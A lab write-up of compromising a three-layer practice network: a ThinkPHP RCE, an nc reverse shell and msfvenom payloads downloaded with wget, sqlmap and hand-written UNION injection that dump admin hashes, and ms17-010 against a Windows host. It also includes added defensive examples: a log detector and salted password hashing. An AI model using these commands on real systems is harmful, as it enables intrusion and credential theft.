Penetrating the CFS three-layer target range
- March 9, 2020
- Notes
Environment setup
Set up three VMnet adapters

VMnet8 is set as the outbound (internet-facing) network.
VMnet8: subnet IP 192.168.42.0, subnet mask 255.255.255.0
VMnet1 and VMnet2 are set to host-only mode. These two networks cannot reach the outside, so they serve as our intranet hosts. Their subnet addresses are:
VMnet1: subnet IP 192.168.22.0, subnet mask 255.255.255.0
VMnet2: subnet IP 192.168.33.0, subnet mask 255.255.255.0
Network topology diagram

In the Baota (BT) panel, set up the website bound to the corresponding IP.
Information gathering on Target1_CentOS 7
root@kepler:~/桌面# nmap -T4 -A 192.168.42.3 --script=vuln
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-03 17:24 CST
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Stats: 0:08:44 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.67% done; ETC: 17:33 (0:00:02 remaining)
Stats: 0:08:46 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.67% done; ETC: 17:33 (0:00:02 remaining)
Nmap scan report for 192.168.42.3
Host is up (0.00066s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     Pure-FTPd
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown: 
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| vulners: 
|   cpe:/a:openbsd:openssh:7.4: 
|       CVE-2018-15919  5.0     https://vulners.com/cve/CVE-2018-15919
|_      CVE-2017-15906  5.0     https://vulners.com/cve/CVE-2017-15906
80/tcp   open  http    nginx
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|_  /robots.txt: Robots file
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
111/tcp  open  rpcbind 2-4 (RPC #100000)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|_  100000  3,4          111/udp6  rpcbind
888/tcp  open  http    nginx
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
3306/tcp open  mysql   MySQL (unauthorized)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)
8888/tcp open  http    Ajenti http control panel
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|_  /robots.txt: Robots file
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
MAC Address: 00:0C:29:78:B2:1B (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT      ADDRESS
1   0.66 ms  192.168.42.3

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 564.68 seconds
Start with port 80.

It turns out to be the ThinkPHP framework, version V5.0, which brings to mind the ThinkPHP V5.0 RCE vulnerability.

Execute commands following the POC:
http://192.168.42.3/?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
Pop a reverse shell directly.
Listen locally: nc -lvp 6666
On the target: nc 192.168.42.4 6666 -e /bin/bash

Then use
python -c 'import pty;pty.spawn("/bin/bash")'
to get an interactive shell.

Testing shows the target machine can use wget, so generate an ELF payload with msf.
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.42.4 LPORT=1111 -f elf >shell.elf
Start a temporary web server on the local machine:
python -m SimpleHTTPServer 8080
On the compromised host, download the ELF:
wget http://192.168.42.4:8080/shell.elf
chmod +x shell.elf
Set up the listener on the Kali machine:
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf5 exploit(multi/handler) > set LHOST 192.168.42.4
LHOST => 192.168.42.4
msf5 exploit(multi/handler) > set LPORT 1111
LPORT => 1111
msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.42.4:1111
Run the ELF on the compromised host.

Use this MSF command to get the current subnets:
run get_local_subnets
Add a route:
run autoroute -s 192.168.22.0/24
Check the routing rules:
route
Then background the session.
Use
auxiliary/scanner/portscan/tcp
to scan the 192.168.22.0/24 range.

Found the second-layer target machine.
Use the proxy module
auxiliary/server/socks4a

Once it is up, configure the proxy in /etc/proxychains.conf.

Scan the second-layer intranet:
proxychains nmap -Pn -sT 192.168.22.2
A SOCKS proxy only carries TCP connections, not ARP or ICMP, so a TCP connect scan (-sT, with -Pn to skip the ping) is used.
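The reason only a connect scan works through the socks4a pivot is visible in the protocol itself: a SOCKS4/4a request has exactly one useful command, CONNECT to a TCP host:port, and the proxy answers with granted or rejected after attempting that connection. The following is an added example, not part of these notes or of any tool mentioned here. It encodes and decodes SOCKS4/4a CONNECT requests and replies with the standard library, and stands in a constructed `simulated_proxy` for the socks4a server on the pivot host (the `reachable` set is constructed, not a real network state).

```python
import socket
import struct

SOCKS4_VERSION = 4
CMD_CONNECT = 1          # the only command a scan can use; there is no "ping" or "arp"
REPLY_GRANTED = 0x5A
REPLY_REJECTED = 0x5B


def build_connect(host, port, user=b""):
    """Client side: SOCKS4/4a CONNECT request.

    Layout: VN=4, CD=1, DSTPORT (2 bytes), DSTIP (4 bytes), USERID, NUL.
    SOCKS4a: DSTIP is 0.0.0.x and the hostname follows, NUL-terminated, so
    the proxy (the pivot host) resolves it.
    """
    try:
        ip = socket.inet_aton(host)              # literal IPv4
        tail = user + b"\x00"
    except OSError:
        ip = b"\x00\x00\x00\x01"                 # 4a marker: "resolve this for me"
        tail = user + b"\x00" + host.encode() + b"\x00"
    return struct.pack("!BBH", SOCKS4_VERSION, CMD_CONNECT, port) + ip + tail


def parse_request(data):
    """Proxy side: every pivoted connection reveals its full destination here."""
    vn, cd, port = struct.unpack("!BBH", data[:4])
    if vn != SOCKS4_VERSION:
        raise ValueError("not a SOCKS4 request")
    ip_raw = data[4:8]
    fields = data[8:].split(b"\x00")
    user = fields[0].decode()
    if ip_raw[:3] == b"\x00\x00\x00" and ip_raw[3] != 0:
        host = fields[1].decode()                # SOCKS4a hostname form
    else:
        host = socket.inet_ntoa(ip_raw)
    return {"cmd": cd, "host": host, "port": port, "user": user}


def parse_reply(data):
    """Client side: 8-byte reply VN=0, CD, DSTPORT, DSTIP -> (granted, port, ip)."""
    if len(data) < 8:
        raise ValueError("short SOCKS4 reply")
    vn, cd, port = struct.unpack("!BBH", data[:4])
    if vn != 0:
        raise ValueError("bad reply version")
    return cd == REPLY_GRANTED, port, socket.inet_ntoa(data[4:8])


def simulated_proxy(request, open_ports):
    """Constructed stand-in for the socks4a server on the pivot. A real one
    performs a full TCP connect to the destination and reports 0x5A on
    success or 0x5B on failure; here the outcome comes from open_ports."""
    req = parse_request(request)
    cd = REPLY_GRANTED if (req["host"], req["port"]) in open_ports else REPLY_REJECTED
    try:
        ip = socket.inet_aton(req["host"])
    except OSError:
        ip = b"\x00\x00\x00\x00"
    return struct.pack("!BBH", 0, cd, req["port"]) + ip


if __name__ == "__main__":
    # Constructed intranet state: only 80/tcp answers on 192.168.22.2.
    reachable = {("192.168.22.2", 80)}
    for port in (22, 80, 443):
        reply = simulated_proxy(build_connect("192.168.22.2", port), reachable)
        granted, _, _ = parse_reply(reply)
        print(f"192.168.22.2:{port} -> {'open' if granted else 'rejected'}")
```

Two things follow from the exchange. A rejected CONNECT only says "the pivot could not complete a TCP handshake", so closed and filtered ports look the same through the proxy. And because every probe is a complete TCP connection originating from the pivot host itself, the scan is fully visible in that host's own connection logging (for example auditd or conntrack), which is where a defender would look for a compromised web server suddenly connecting to dozens of intranet ports.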

Port 80 was already found in the earlier scan,
so check the service on port 80 first.

Scan directories with dirb:
proxychains dirb http://192.168.22.2
Out of habit, also check robots.txt.

Found the admin backend.

Viewing the page source reveals a hint.


Then use
proxychains sqlmap -u "http://192.168.22.2/index.php?r=vul&keyword=1" # test the injection point
It is a MySQL database.
proxychains sqlmap -u "http://192.168.22.2/index.php?r=vul&keyword=1" -p keyword --dbs # list databases

proxychains sqlmap -u "http://192.168.22.2/index.php?r=vul&keyword=1" -p keyword -D bagecms --tables

proxychains sqlmap -u "http://192.168.22.2/index.php?r=vul&keyword=1" -p keyword -D bagecms -T bage_admin --columns

proxychains sqlmap -u "http://192.168.22.2/index.php?r=vul&keyword=1" -p keyword -D bagecms -T bage_admin -C username,password --dump

This yields the username and password.
The environment had problems earlier, so the injection was also done by hand:
Determine the number of columns:
http://192.168.22.2/index.php?r=vul&keyword=1' order by 39 --+
Get the database name:
http://192.168.22.2/index.php?r=vul&keyword=1' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,group_concat(schema_name) from information_schema.schemata --+
Database name: bagecms
Get the table names:
http://192.168.22.2/index.php?r=vul&keyword=1' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,group_concat(table_name) from information_schema.tables where table_schema='bagecms' --+
Tables: age_ad,bage_admin,bage_admin_group,bage_admin_logger,bage_attr,bage_attr_val,bage_catalog,bage_config,bage_link,bage_page,bage_post,bage_post_2tags,bage_post_album,bage_post_comment,bage_post_tags,bage_question,bage_special,bage_upload
Get the column names (note the comma before group_concat, missing in the original notes):
http://192.168.22.2/index.php?r=vul&keyword=1' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,group_concat(column_name) from information_schema.columns where table_name='bage_admin' --+
Columns: id,username,password,realname,group_id,email,qq,notebook,mobile,telephone,last_login_ip,last_login_time,login_count,status_is,create_time
Get the values:
http://192.168.22.2/index.php?r=vul&keyword=1' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,group_concat(id,username,password) from bage_admin --+
Values: admin 46f94c8de14fb36680850768ff1b7f2a
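Both the ThinkPHP invokefunction request used against the first host and the UNION injection against index.php?r=vul leave characteristic strings in the web server's access log, so a defender can find this whole intrusion path after the fact. The following is an added example, not part of these notes: a small detector that reads nginx combined-format log lines, URL-decodes the request, and flags the two patterns. The log lines are constructed (they mirror the requests shown above; they are not captured traffic), and the log format is assumed to be nginx's default combined format.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed nginx "combined"-format access log lines (not captured traffic).
# Line 1 mirrors the ThinkPHP invokefunction request, line 3 the UNION query.
SAMPLE_LOG = """\
192.168.42.4 - - [03/Mar/2020:17:40:01 +0800] "GET /?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami HTTP/1.1" 200 31 "-" "Mozilla/5.0"
192.168.42.9 - - [03/Mar/2020:17:41:12 +0800] "GET /index.php?r=post&id=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.168.42.4 - - [03/Mar/2020:17:42:33 +0800] "GET /index.php?r=vul&keyword=1%27%20union%20select%201,2,3,group_concat(schema_name)%20from%20information_schema.schemata%20--%2B HTTP/1.1" 200 8123 "-" "sqlmap/1.4"
192.168.42.9 - - [03/Mar/2020:17:43:05 +0800] "GET /robots.txt HTTP/1.1" 200 26 "-" "curl/7.68.0"
"""

# Fields of the combined format we need: client IP, timestamp, method, URL, status.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) \S+" (?P<status>\d{3}) '
)

# ThinkPHP 5.0.x invokefunction RCE: the "s" route (or the path) targets the
# invokefunction method, which then invokes an arbitrary PHP callable.
THINKPHP_RCE = re.compile(r"invokefunction|call_user_func", re.I)

# UNION-based SQL injection: a quote breaking out of the string literal
# followed by UNION ... SELECT, or a direct read of information_schema.
SQLI_UNION = re.compile(
    r"(?:'|%27).*?\bunion\b.*?\bselect\b|information_schema\.", re.I
)


def decode_url(url):
    # Decode twice so double-encoded payloads are compared in the form the
    # application actually parses.
    return unquote_plus(unquote_plus(url))


def scan_log(text):
    """Return one alert dict per (line, matched rule)."""
    alerts = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip it
        url = decode_url(m.group("url"))
        query = urlsplit(url).query
        rules = []
        if THINKPHP_RCE.search(url):
            rules.append("thinkphp_rce")
        if SQLI_UNION.search(query):
            rules.append("sqli_union")
        for rule in rules:
            alerts.append({"ip": m.group("ip"), "time": m.group("ts"),
                           "rule": rule, "url": url})
    return alerts


if __name__ == "__main__":
    for a in scan_log(SAMPLE_LOG):
        print(f"{a['time']} {a['ip']} {a['rule']}: {a['url'][:80]}")
```

Run it against a real access.log by reading the file into `scan_log`. Decoding before matching matters: the UNION query above arrives percent-encoded and would not match the raw line. The two patterns are deliberately narrow; in production they belong in a WAF or log pipeline alongside a rule for the many ThinkPHP variants, but the invokefunction and information_schema strings alone would have caught every request in this write-up.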
Then look up the MD5 on a website to recover the plaintext.
After logging in to the site, look for a place to get a shell.
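The admin hash was recovered with an online MD5 lookup, which works because the application stores an unsalted fast hash: the same password always gives the same hash, so a precomputed table answers it instantly. The following is an added example, not part of these notes or of the CMS in question. It shows the lookup with a tiny constructed table standing in for the online service (the hash on the page is not used or resolved here), and beside it the stored form that defeats the lookup: salted, iterated PBKDF2-HMAC-SHA256 from the standard library.

```python
import hashlib
import hmac
import os

# Constructed stand-in for an online MD5 reverse-lookup service: a dictionary
# keyed by the unsalted hash of a few common passwords. Real services hold
# billions of precomputed entries, which is why an unsalted MD5 admin hash
# is effectively plaintext once it leaks through SQL injection.
MD5_LOOKUP = {
    hashlib.md5(p.encode()).hexdigest(): p
    for p in ("123456", "password", "admin", "qwerty", "letmein")
}


def crack_unsalted_md5(hexdigest):
    """Reverse an unsalted MD5 by table lookup; None if not in the table."""
    return MD5_LOOKUP.get(hexdigest.lower())


def hash_password(password, salt=None, iterations=600_000):
    """Store passwords as salted, iterated PBKDF2-HMAC-SHA256 instead.

    Returns "pbkdf2_sha256$<iterations>$<salt hex>$<hash hex>". A fresh random
    salt per user makes precomputed tables useless; the iteration count makes
    each guess expensive.
    """
    if salt is None:
        salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password, stored):
    """Recompute with the stored salt and iterations; constant-time compare."""
    algo, iterations, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError("unsupported hash format")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    leaked = hashlib.md5(b"admin").hexdigest()   # constructed, not the page's hash
    print("unsalted md5 ->", crack_unsalted_md5(leaked))
    stored = hash_password("admin")
    print("pbkdf2 record ->", stored)
    print("verify ->", verify_password("admin", stored))
```

With the salted form, the dump obtained through the injection would still have to be brute-forced per user at the configured cost, and a weak admin password remains weak; the lookup shortcut used in this write-up, however, no longer applies.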

Spotted the template editing area.

Then open AntSword through the proxy:
proxychains ./AntSword

After connecting, generate an ELF with msf. Since the target sits in the second-layer intranet, use a bind payload:
msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=1234 -f elf > shell1234.elf
Start msfconsole through the proxy (proxychains msfconsole), otherwise it cannot reach the target.
The listener likewise uses bind_tcp, a forward connection.
Then upload shell1234.elf with AntSword and run it:
chmod +x shell1234.elf
./shell1234.elf

Session established.
Add a route:
run autoroute -s 192.168.33.0/24
Then scan the intranet:
auxiliary/scanner/smb/smb_version

In the third-layer intranet
a Windows 7 machine is found.
Try an ms17-010 scan:
use auxiliary/scanner/smb/smb_ms17_010

Use
use exploit/windows/smb/ms17_010_psexec
Use a bind (forward-connect) payload so the connection to the shell can be established:
set payload windows/x64/meterpreter/bind_tcp

The third-layer intranet is successfully reached.